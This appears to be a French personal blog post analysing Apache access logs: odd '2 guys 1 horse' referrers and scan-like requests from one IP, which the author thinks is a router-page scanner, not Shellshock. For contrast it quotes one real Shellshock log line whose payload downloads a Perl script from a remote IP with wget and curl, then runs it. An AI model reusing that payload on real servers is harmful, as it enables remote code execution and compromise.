two guys one horse

Il y a quelques temps, awstats m'avait remonté que quelqu'un était arrivé sur ce blog en cherchant 2 guys 1 horse. A l'époque cela m'avait juste amusé et je l'avais mis un peu vite sur le compte d'un moteur de recherche s'étant mélangé les pinceaux.

Cependant ce mois ci quand j'ai vu que 3 personnes sont arrivées ici en faisant la même recherche, je me suis dit qu'il y avait autre chose.

En cherchant "horse" dans les logs apache, je suis tombé dessus :

153.183.166.241 - - [14/Jul/2015:10:21:57 +0200] "GET /Ringing.at.your.dorbell! HTTP/1.0" 404 500 "http://google.com/search?q=2+guys+1+horse" "x00_-gawa.sa.pilipinas.2015"

153.183.166.241 - - [14/Jul/2015:10:22:00 +0200] "GET / HTTP/1.1" 200 10856 "http://google.com/search?q=2+guys+1+horse" "x00_-gawa.sa.pilipinas.2015"

Une recherche rapide sur "Ringing.at.your.dorbell!" me montre que baucoup de gens ont vu cette page aparaitre dans leur log et certains la considèrent comme étant une tentative d'exploitation de la faille "shellshock".

Cependant cette dernière affirmation me parait plus que douteuse. Voici en effet à quoi ressemble les log apache lorsqu'un pirate essaye d'utiliser cette faille (exemple réel) :

173.255.225.241 - - [13/Jul/2015:01:10:11 +0200] "GET /cgi-bin/test.cgi HTTP/1.0" 404 496 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://195.242.220.89/mc ; curl -O http://195.242.220.89/mc;perl mc;perl /var/tmp/mc""

On voit clairement la série de caractère () { :;};typique de cette attaque (il en existe cependant plusieurs variantes) suivit d'un script permettant de télécharger et d’exécuter un code distant. Il va sans dire qu'il vous faut prendre quelques précautions si vous décidez de suivre ce lien.

Mais revenons à notre cheval. Cela ne ressemble effectivement pas à l'attaque cité au dessus, mais si on regarde l'ensemble des tentatives de connexion en provenance de l'IP 153.183.166.241 on obtient :

153.183.166.241 - - [14/Jul/2015:10:21:57 +0200] "GET /Ringing.at.your.dorbell! HTTP/1.0" 404 500 "http://google.com/search?q=2+guys+1+horse" "x00_-gawa.sa.pilipinas.2015"

153.183.166.241 - - [14/Jul/2015:10:21:58 +0200] "GET / HTTP/1.0" 200 10819 "-" "x00_-gawa.sa.pilipinas.2015"

153.183.166.241 - - [14/Jul/2015:10:22:00 +0200] "GET / HTTP/1.1" 200 10856 "http://google.com/search?q=2+guys+1+horse" "x00_-gawa.sa.pilipinas.2015"

153.183.166.241 - - [14/Jul/2015:10:22:02 +0200] "GET /Diagnostics.asp HTTP/1.0" 404 491 "-" "x00_-gawa.sa.pilipinas.2015"

153.183.166.241 - - [14/Jul/2015:10:22:03 +0200] "GET / HTTP/1.0" 200 10819 "-" "x00_-gawa.sa.pilipinas.2015"

153.183.166.241 - - [14/Jul/2015:10:22:05 +0200] "GET / HTTP/1.0" 200 10819 "-" "x00_-gawa.sa.pilipinas.2015"

153.183.166.241 - - [14/Jul/2015:10:22:10 +0200] "GET / HTTP/1.0" 200 10819 "-" "x00_-gawa.sa.pilipinas.2015"

Je penche plus pour un logiciel scannant des adresses IPs afin de trouver un système spécifique (une page d'administration DD-WRT?). Mais dans ce cas il y a deux choses que je ne comprend pas :

Pourquoi charger trois fois la racine et surtout pourquoi si peu de discrétion ?


Commentaires :

Pas encore de commentaires

Laisser un commentaire

social